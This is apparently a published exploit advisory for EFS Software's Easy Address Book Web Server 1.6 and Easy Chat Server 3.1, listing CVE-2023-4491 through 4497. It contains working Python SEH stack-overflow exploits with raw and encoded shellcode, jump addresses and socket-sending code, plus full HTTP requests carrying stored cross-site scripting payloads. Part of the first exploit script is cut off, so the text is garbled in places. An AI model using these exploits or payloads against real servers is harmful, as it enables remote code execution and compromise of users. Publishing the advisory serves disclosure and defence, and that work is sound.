# Exploit Title: Easy Address Book Web Server v1.6 - Multiple Vulnerabilities # Discovery by: Rafael Pedrero # Discovery Date: 2021-01-10 # CVE: CVE-2023-4491, CVE-2023-4492, CVE-2023-4493 # Vendor Homepage: http://www.efssoft.com/web-address-book-server.html # Software Link : http://www.efssoft.com/eabws.exe (md5sum: 69f77623bb32589fb5343f598b61bbd9) # Tested Version: 1.6 # Tested on: Windows 7, 10 # CVE-2023-4491: Vulnerability Type: searchbook Remote Buffer Overflow CVSS v3: 9.8 CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CWE: CWE-119 Vulnerability description: There is a remote stack-based buffer overflow (SEH) in /searchbook.ghp in EFS Software Easy Address Book Web Server 1.6. By sending an overly long username string to /searchbook.ghp for asking the name via POST, an attacker may be able to execute arbitrary code. Proof of concept: import socket import struct def sendbuff(): # > arwin.exe kernel32.dll WinExec # WinExec is located at 0x776f2c91 in kernel32.dll shellcode_WinExec = ( "\x33\xc0" # XOR EAX,EAX "\x50" # PUSH EAX => padding for lpCmdLine "\x68\x2E\x65\x78\x65" # PUSH ".exe" "\x68\x63\x61\x6C\x63" # PUSH "calc" "\x8B\xC4" # MOV EAX,ESP "\x6A\x01" # PUSH 1 "\x50" # PUSH EAX "\xBB\x91\x2c\x6f\x77" # MOV EBX,kernel32.WinExec "\xFF\xD3") # CALL EBX shellcode_system = ( "\x31\xC9" # xor ecx,ecx "\x51" # push ecx "\x68\x63\x61\x6C\x63" # push 0x636c6163 "\x54" # push dword ptr esp "\xB8\x6f\xb1\xdc\x75" # mov eax,msvcrt.system "\xFF\xD0") # call eax shellcode = shellcode_WinExec # SEH junk1 = "A"*455 buffer = junk1 buffer += "\xeb\x10\x90\x90" # jmp 0x10 to nops to shellcode buffer += struct.pack(' demo1 demo1 demo1@demo1.com demo1, , , , USA Edit Delete # CVE-2023-4493: Vulnerability Type: stored Cross-Site Scripting (XSS) - #2 CVSS v3: 6.5 CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N CWE: CWE-79 Vulnerability description: Easy Address Book Web Server v1.6, does not sufficiently encode user-controlled inputs, resulting in a stored Cross-Site Scripting (XSS) vulnerability via the /users_admin.ghp (POST method, authenticated Admin user), in multiple parameters. Proof of concept: Example 1: POST http://localhost/users_admin.ghp HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Content-Type: application/x-www-form-urlencoded Content-Length: 134 Origin: http://localhost Connection: keep-alive Referer: http://localhost/users_admin.ghp Cookie: SESSIONID=19655; UserID=Admin; PassWD= Upgrade-Insecure-Requests: 1 Host: localhost userid=2&username=test&password=test&email=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&level=user&state=Enable&update_user=Update Vulnerable parameter: email Response:
"> Delete
Example 2: POST http://localhost/users_admin.ghp HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Content-Type: application/x-www-form-urlencoded Content-Length: 144 Origin: http://localhost Connection: keep-alive Referer: http://localhost/users_admin.ghp Cookie: SESSIONID=19655; UserID=Admin; PassWD= Upgrade-Insecure-Requests: 1 Host: localhost userid=2&username=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&password=test&email=tt% 40fsdfs.com&level=user&state=Enable&update_user=Update Vulnerable parameter: username Response:
"> Delete
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- # Exploit Title: Easy Chat Server v3.1 - Multiple Vulnerabilities # Discovery by: Rafael Pedrero # Discovery Date: 2021-01-09 # CVE: CVE-2023-4494, CVE-2023-4495, CVE-2023-4496, CVE-2023-4497 # Vendor Homepage: http://www.echatserver.com/ # Software Link : http://echatserver.com/ecssetup.exe (md5sum: c682138ebbea9af7948a3f142bbd054b) # Tested Version: 3.1 # Tested on: Windows 7, 10 # CVE-2023-4494: Vulnerability Type: register Remote Buffer Overflow CVSS v3: 9.8 CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CWE: CWE-119 Vulnerability description: There is a remote stack-based buffer overflow (SEH) in register.ghp in EFS Software Easy Chat Server versions 2.0 to 3.1. By sending an overly long username string to register.ghp for asking the username via GET, an attacker may be able to execute arbitrary code. Proof of concept: import socket def sendbuff(): # calc shellcode from https://code.google.com/p/win-exec-calc-shellcode/ # msfencode -b "\x00\x20" -i w32-exec-calc-shellcode.bin # [*] x86/shikata_ga_nai succeeded with size 101 (iteration=1) shellcode = ( "\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" + "\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" + "\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9" + "\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" + "\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" + "\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8" + "\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a" + "\x1c\x39\xbd" ) # SEH junk1 = "A"*473 buffer = junk1 buffer += "\xeb\x06\x90\x90" # short jmp to shellcode buffer += "\x1e\x0e\x01\x10" # pop/pop/ret @ 0x10010E1E SSLEAY32.DLL from !Mona buffer += shellcode junk2 = "D"*(600 - 473 - len(shellcode) - 4 - 4) buffer += junk2 return buffer def REQ_GET (padding): GET = ( "GET /register.ghp?username=" + padding + "&password= HTTP/1.1\r\n" "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36\r\n" "Host: "+str(ip)+":80\r\n" "Accept-Language: es-es\r\n" "Accept-Encoding: gzip, deflate\r\n" "Referer: http://"+str(ip)+"\r\n" "Connection: Keep-Alive\r\n\r\n" ) return GET ip = '192.168.X.X' # change the ip address port = 80 payload = sendbuff() try: print "\n[*] Sending GET (register.ghp) exploit to EFS Easy Chat Server 3.1, length " + str(len(payload)) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((ip, port)) s.send(REQ_GET(payload)) s.recv(1024) s.close() print "\n[*] Sended GET length " + str(len(payload)) except: print "Connection error" # CVE-2023-4495: Vulnerability Type: stored Cross-Site Scripting (XSS) - #1 CVSS v3: 6.5 CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N CWE: CWE-79 Vulnerability description: Easy Chat Server v3.1, does not sufficiently encode user-controlled inputs, resulting in a stored Cross-Site Scripting (XSS) vulnerability via the /registresult.htm (POST method), in Resume parameter. The XSS is loaded from /register.ghp. Proof of concept: POST http://localhost/registresult.htm HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Content-Type: application/x-www-form-urlencoded Content-Length: 257 Origin: http://localhost Connection: keep-alive Referer: http://localhost/register.ghp?username= &password= Upgrade-Insecure-Requests: 1 Host: localhost UserName=&Password=&Password1=demo1&Sex=0&Email=demo1% 25252540demo1.com &Icon=0.gif&Resume=%3C%2FTEXTAREA%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3CTEXTAREA%3E&cw=0&RoomID=%3C%21--%24RoomID--%3E&RepUserName=%3C%21--%24UserName--%3E&submit1=Change Response
Congratulations! Your information has been changed successfully.
Go to: http://localhost/register.ghp?username=&password= Response - xss: Your profile/interests:
# CVE-2023-4496: Vulnerability Type: stored Cross-Site Scripting (XSS) - #2 CVSS v3: 6.5 CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N CWE: CWE-79 Vulnerability description: Easy Chat Server v3.1, does not sufficiently encode user-controlled inputs, resulting in a stored Cross-Site Scripting (XSS) vulnerability via the /body2.ghp (POST method), in mtowho parameter. Proof of concept: POST http://localhost/body2.ghp?username=&password=&room=4 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Content-Type: application/x-www-form-urlencoded Content-Length: 248 Origin: http://localhost Connection: keep-alive Referer: http://localhost/chatsubmit.ghp?username= &password=&room=4 Upgrade-Insecure-Requests: 1 Host: localhost staticname=%3A000539&tnewname=&msayinfo=demo+&mnewname=&mtowho=%3C%2Fscript%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cscript%3E&mfilters=0&mfont=0&mfcolor=1&elist=100&seltype=Theme&msg=&Submit=Send&sc=on¬ifysound=on&message=demo+&chat_flag= Response: # CVE-2023-4497: Vulnerability Type: stored Cross-Site Scripting (XSS) - #3 CVSS v3: 6.5 CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N CWE: CWE-79 Vulnerability description: Easy Chat Server v3.1, does not sufficiently encode user-controlled inputs, resulting in a stored Cross-Site Scripting (XSS) vulnerability via the /registresult.htm (POST method), in Icon parameter. The XSS is loaded from /users.ghp. Proof of concept: POST /registresult.htm HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 235 Origin: http://localhost Connection: close Referer: http://localhost/register.ghp?username= &password= Upgrade-Insecure-Requests: 1 UserName=&Password=&Password1=&Sex=0&Email=%252525252540.com&Icon=">
Congratulations! Your information has been changed successfully.
When user information page load: http://localhost/users.ghp?username=&password=&room=4  [vip room]

[Online users:1]

[All]

[]<==



[Change infomation]